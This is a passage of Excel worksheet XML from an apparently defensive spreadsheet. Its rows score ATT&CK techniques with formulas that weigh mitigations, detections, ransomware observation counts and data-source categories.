        <v>0</v>
      </c>
      <c r="G541" s="37">
        <v>1</v>
      </c>
      <c r="H541" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I541" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J541" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K541" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L541" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M541" s="37">
        <v>0</v>
      </c>
      <c r="N541" s="56">
        <v>0</v>
      </c>
      <c r="O541" s="56">
        <v>10</v>
      </c>
      <c r="P541" s="56">
        <v>0</v>
      </c>
      <c r="Q541" s="56">
        <v>0</v>
      </c>
      <c r="R541" s="57"/>
      <c r="S541" s="57">
        <v>0</v>
      </c>
      <c r="T541" s="57"/>
      <c r="U541" s="57">
        <v>0</v>
      </c>
      <c r="V541" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="W541" s="37">
        <v>0</v>
      </c>
      <c r="X541" s="37">
        <v>0</v>
      </c>
      <c r="Y541" s="37">
        <v>0</v>
      </c>
      <c r="Z541" s="37">
        <v>10</v>
      </c>
      <c r="AA541" s="37">
        <v>0.1</v>
      </c>
      <c r="AB541" s="37">
        <v>0.1</v>
      </c>
      <c r="AC541" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD541" s="50" t="s">
        <v>1836</v>
      </c>
      <c r="AE541" s="37" t="str" cm="1">
        <f t="array" ref="AE541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF541" s="37">
        <v>537</v>
      </c>
      <c r="AG541" s="37" t="str" cm="1">
        <f t="array" ref="AG541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH541" s="37">
        <v>537</v>
      </c>
      <c r="AI541" s="37" t="str" cm="1">
        <f t="array" ref="AI541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ541" s="37">
        <v>537</v>
      </c>
      <c r="AK541" s="37" t="str" cm="1">
        <f t="array" ref="AK541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL541" s="37">
        <v>537</v>
      </c>
      <c r="AM541" s="37" t="str" cm="1">
        <f t="array" ref="AM541">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD541)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN541" s="37">
        <v>0</v>
      </c>
      <c r="AO541" s="37">
        <v>0</v>
      </c>
      <c r="AP541" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ541" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>69.927777777777777</v>
      </c>
      <c r="AR541" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS541" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT541" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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42" spans="1:47" ht="34">
      <c r="A542" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B542" s="37">
        <f t="shared" si="8"/>
        <v>107.65</v>
      </c>
      <c r="C542" s="37" t="s">
        <v>1837</v>
      </c>
      <c r="D542" s="50" t="s">
        <v>1835</v>
      </c>
      <c r="E542" s="37" t="s">
        <v>1838</v>
      </c>
      <c r="F542" s="37">
        <v>0</v>
      </c>
      <c r="G542" s="37">
        <v>1</v>
      </c>
      <c r="H542" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I542" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J542" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K542" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L542" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M542" s="37">
        <v>0</v>
      </c>
      <c r="N542" s="56">
        <v>0</v>
      </c>
      <c r="O542" s="56">
        <v>0</v>
      </c>
      <c r="P542" s="56">
        <v>0</v>
      </c>
      <c r="Q542" s="56">
        <v>0</v>
      </c>
      <c r="R542" s="57"/>
      <c r="S542" s="57">
        <v>0</v>
      </c>
      <c r="T542" s="57"/>
      <c r="U542" s="57">
        <v>0</v>
      </c>
      <c r="V542" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W542" s="37">
        <v>0</v>
      </c>
      <c r="X542" s="37">
        <v>0</v>
      </c>
      <c r="Y542" s="37">
        <v>0</v>
      </c>
      <c r="Z542" s="37">
        <v>0</v>
      </c>
      <c r="AA542" s="37">
        <v>0</v>
      </c>
      <c r="AB542" s="37">
        <v>0</v>
      </c>
      <c r="AC542" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD542" s="50" t="s">
        <v>1839</v>
      </c>
      <c r="AE542" s="37" t="str" cm="1">
        <f t="array" ref="AE542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF542" s="37">
        <v>538</v>
      </c>
      <c r="AG542" s="37" t="str" cm="1">
        <f t="array" ref="AG542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH542" s="37">
        <v>538</v>
      </c>
      <c r="AI542" s="37" t="str" cm="1">
        <f t="array" ref="AI542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ542" s="37">
        <v>538</v>
      </c>
      <c r="AK542" s="37" t="str" cm="1">
        <f t="array" ref="AK542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL542" s="37">
        <v>538</v>
      </c>
      <c r="AM542" s="37" t="str" cm="1">
        <f t="array" ref="AM542">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD542)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN542" s="37">
        <v>0</v>
      </c>
      <c r="AO542" s="37">
        <v>2</v>
      </c>
      <c r="AP542" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ542" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.883333333333333</v>
      </c>
      <c r="AR542" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS542" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT542" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU54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1.7563492063492063</v>
      </c>
    </row>
    <row r="543" spans="1:47" ht="17">
      <c r="A543" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B543" s="37">
        <f t="shared" si="8"/>
        <v>128.39285714285714</v>
      </c>
      <c r="C543" s="37" t="s">
        <v>1840</v>
      </c>
      <c r="D543" s="50" t="s">
        <v>1835</v>
      </c>
      <c r="E543" s="37" t="s">
        <v>1841</v>
      </c>
      <c r="F543" s="37">
        <v>0</v>
      </c>
      <c r="G543" s="37">
        <v>1</v>
      </c>
      <c r="H543" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I543" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J543" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K543" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L543" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M543" s="37">
        <v>0</v>
      </c>
      <c r="N543" s="56">
        <v>0</v>
      </c>
      <c r="O543" s="56">
        <v>0</v>
      </c>
      <c r="P543" s="56">
        <v>0</v>
      </c>
      <c r="Q543" s="56">
        <v>2</v>
      </c>
      <c r="R543" s="57"/>
      <c r="S543" s="57">
        <v>0</v>
      </c>
      <c r="T543" s="57"/>
      <c r="U543" s="57">
        <v>0</v>
      </c>
      <c r="V543" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W543" s="37">
        <v>0</v>
      </c>
      <c r="X543" s="37">
        <v>0</v>
      </c>
      <c r="Y543" s="37">
        <v>0</v>
      </c>
      <c r="Z543" s="37">
        <v>2</v>
      </c>
      <c r="AA543" s="37">
        <v>0.02</v>
      </c>
      <c r="AB543" s="37">
        <v>0.02</v>
      </c>
      <c r="AC543" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD543" s="50" t="s">
        <v>1842</v>
      </c>
      <c r="AE543" s="37" t="str" cm="1">
        <f t="array" ref="AE543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF543" s="37">
        <v>539</v>
      </c>
      <c r="AG543" s="37" t="str" cm="1">
        <f t="array" ref="AG543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH543" s="37">
        <v>539</v>
      </c>
      <c r="AI543" s="37" t="str" cm="1">
        <f t="array" ref="AI543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ543" s="37">
        <v>539</v>
      </c>
      <c r="AK543" s="37" t="str" cm="1">
        <f t="array" ref="AK543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL543" s="37">
        <v>539</v>
      </c>
      <c r="AM543" s="37" t="str" cm="1">
        <f t="array" ref="AM543">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD543)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN543" s="37">
        <v>0</v>
      </c>
      <c r="AO543" s="37">
        <v>1</v>
      </c>
      <c r="AP543" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ543" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>42.797619047619044</v>
      </c>
      <c r="AR543" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS543" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT543" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU54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1.042800453514739</v>
      </c>
    </row>
    <row r="544" spans="1:47" ht="17">
      <c r="A544" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B544" s="37">
        <f t="shared" si="8"/>
        <v>108.05000000000001</v>
      </c>
      <c r="C544" s="37" t="s">
        <v>1843</v>
      </c>
      <c r="D544" s="50" t="s">
        <v>1835</v>
      </c>
      <c r="E544" s="37" t="s">
        <v>1844</v>
      </c>
      <c r="F544" s="37">
        <v>0</v>
      </c>
      <c r="G544" s="37">
        <v>1</v>
      </c>
      <c r="H544" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I544" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J544" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K544" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L544" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M544" s="37">
        <v>0</v>
      </c>
      <c r="N544" s="56">
        <v>0</v>
      </c>
      <c r="O544" s="56">
        <v>0</v>
      </c>
      <c r="P544" s="56">
        <v>0</v>
      </c>
      <c r="Q544" s="56">
        <v>0</v>
      </c>
      <c r="R544" s="57"/>
      <c r="S544" s="57">
        <v>0</v>
      </c>
      <c r="T544" s="57"/>
      <c r="U544" s="57">
        <v>0</v>
      </c>
      <c r="V544" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W544" s="37">
        <v>0</v>
      </c>
      <c r="X544" s="37">
        <v>0</v>
      </c>
      <c r="Y544" s="37">
        <v>0</v>
      </c>
      <c r="Z544" s="37">
        <v>0</v>
      </c>
      <c r="AA544" s="37">
        <v>0</v>
      </c>
      <c r="AB544" s="37">
        <v>0</v>
      </c>
      <c r="AC544" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD544" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE544" s="37" t="str" cm="1">
        <f t="array" ref="AE544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF544" s="37">
        <v>540</v>
      </c>
      <c r="AG544" s="37" t="str" cm="1">
        <f t="array" ref="AG544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH544" s="37">
        <v>540</v>
      </c>
      <c r="AI544" s="37" t="str" cm="1">
        <f t="array" ref="AI544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ544" s="37">
        <v>540</v>
      </c>
      <c r="AK544" s="37" t="str" cm="1">
        <f t="array" ref="AK544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL544" s="37">
        <v>540</v>
      </c>
      <c r="AM544" s="37" t="str" cm="1">
        <f t="array" ref="AM544">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD544)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN544" s="37">
        <v>0</v>
      </c>
      <c r="AO544" s="37">
        <v>0</v>
      </c>
      <c r="AP544" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ544" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>36.016666666666673</v>
      </c>
      <c r="AR544" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS544" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT544" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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45" spans="1:47" ht="17">
      <c r="A545" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B545" s="37">
        <f t="shared" si="8"/>
        <v>139.17857142857142</v>
      </c>
      <c r="C545" s="37" t="s">
        <v>1845</v>
      </c>
      <c r="D545" s="50" t="s">
        <v>1835</v>
      </c>
      <c r="E545" s="37" t="s">
        <v>1846</v>
      </c>
      <c r="F545" s="37">
        <v>0</v>
      </c>
      <c r="G545" s="37">
        <v>1</v>
      </c>
      <c r="H545" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I545" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J545" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K545" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L545" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M545" s="37">
        <v>0</v>
      </c>
      <c r="N545" s="56">
        <v>0</v>
      </c>
      <c r="O545" s="56">
        <v>2</v>
      </c>
      <c r="P545" s="56">
        <v>1</v>
      </c>
      <c r="Q545" s="56">
        <v>0</v>
      </c>
      <c r="R545" s="57"/>
      <c r="S545" s="57">
        <v>0</v>
      </c>
      <c r="T545" s="57"/>
      <c r="U545" s="57">
        <v>0</v>
      </c>
      <c r="V545" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W545" s="37">
        <v>0</v>
      </c>
      <c r="X545" s="37">
        <v>0</v>
      </c>
      <c r="Y545" s="37">
        <v>0</v>
      </c>
      <c r="Z545" s="37">
        <v>3</v>
      </c>
      <c r="AA545" s="37">
        <v>0.03</v>
      </c>
      <c r="AB545" s="37">
        <v>0.03</v>
      </c>
      <c r="AC545" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD545" s="50"/>
      <c r="AE545" s="37" t="str" cm="1">
        <f t="array" ref="AE545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF545" s="37">
        <v>541</v>
      </c>
      <c r="AG545" s="37" t="str" cm="1">
        <f t="array" ref="AG545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH545" s="37">
        <v>541</v>
      </c>
      <c r="AI545" s="37" t="str" cm="1">
        <f t="array" ref="AI545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ545" s="37">
        <v>541</v>
      </c>
      <c r="AK545" s="37" t="str" cm="1">
        <f t="array" ref="AK545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL545" s="37">
        <v>541</v>
      </c>
      <c r="AM545" s="37" t="str" cm="1">
        <f t="array" ref="AM545">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD545)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN545" s="37">
        <v>0</v>
      </c>
      <c r="AO545" s="37">
        <v>0</v>
      </c>
      <c r="AP545" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ545" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>46.392857142857139</v>
      </c>
      <c r="AR545" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS545" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT545" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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46" spans="1:47" ht="51">
      <c r="A546" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B546" s="37">
        <f t="shared" si="8"/>
        <v>118.77857142857142</v>
      </c>
      <c r="C546" s="37" t="s">
        <v>1847</v>
      </c>
      <c r="D546" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E546" s="37"/>
      <c r="F546" s="37">
        <v>0</v>
      </c>
      <c r="G546" s="37">
        <v>1</v>
      </c>
      <c r="H546" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I546" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J546" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K546" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L546" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M546" s="37">
        <v>0</v>
      </c>
      <c r="N546" s="56">
        <v>0</v>
      </c>
      <c r="O546" s="56">
        <v>1</v>
      </c>
      <c r="P546" s="56">
        <v>0</v>
      </c>
      <c r="Q546" s="56">
        <v>0</v>
      </c>
      <c r="R546" s="57"/>
      <c r="S546" s="57">
        <v>0</v>
      </c>
